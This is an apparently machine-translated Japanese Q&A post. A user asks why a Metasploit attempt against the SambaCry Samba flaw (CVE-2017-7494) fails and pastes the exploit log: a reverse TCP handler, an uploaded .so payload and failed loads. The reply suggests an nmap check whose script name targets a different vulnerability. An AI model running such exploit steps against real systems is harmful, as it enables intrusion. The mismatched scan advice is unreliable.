2017-06-23 7 views
0

私は、metasploitフレームワークを使用していくつかの研究作業のためにLinuxカーネルの脆弱性samba cry(CVE-2017-7494)を利用しようとしています。しかし、私はmetasploitを使ってsambaの妥当性を利用することができません

[*] Started reverse TCP handler on 192.168.78.136:4444 
[*] 192.168.78.139:445 - Using location \\192.168.78.139\myshare\ for the 
path# 
[*] 192.168.78.139:445 - Retrieving the remote path of the share 'myshare' 
[*] 192.168.78.139:445 - Share 'myshare' has server-side path '/shared 
[*] 192.168.78.139:445 - Uploaded payload to 
\\192.168.78.139\myshare\BsdRHcSh.so 
[*] 192.168.78.139:445 - Loading the payload from server-side path 
/shared/BsdRHcSh.so using \\PIPE\/shared/BsdRHcSh.so... 
[-] 192.168.78.139:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND 
[*] 192.168.78.139:445 - Loading the payload from server-side path 
/shared/BsdRHcSh.so using /shared/BsdRHcSh.so... 
[-] 192.168.78.139:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND 
[*] Exploit completed, but no session was created. 

を実行します>(is_known_pipename)を悪用し、次のエラーMSFを取得し、私のターゲットホストはvalnurableないか、または任意の他の問題であるので、それ?私のターゲットホストには、Sambaバージョン3.6.23があります。私が知る限り、それは価値があります。

おかげ

答えて

1

はSTATUS_OBJECT_NAME_NOT_FOUNDのロードに失敗しました「オブジェクト名が見つからない」という意味です。 おそらくmetasploitがペイロードを共有フォルダにアップロードできませんでした。 nmapを実行して脆弱性の存在を確認できますか? コマンドは nmap -p445 --script smb-vuln-ms17-010 TARGET_IP

です。
関連する問題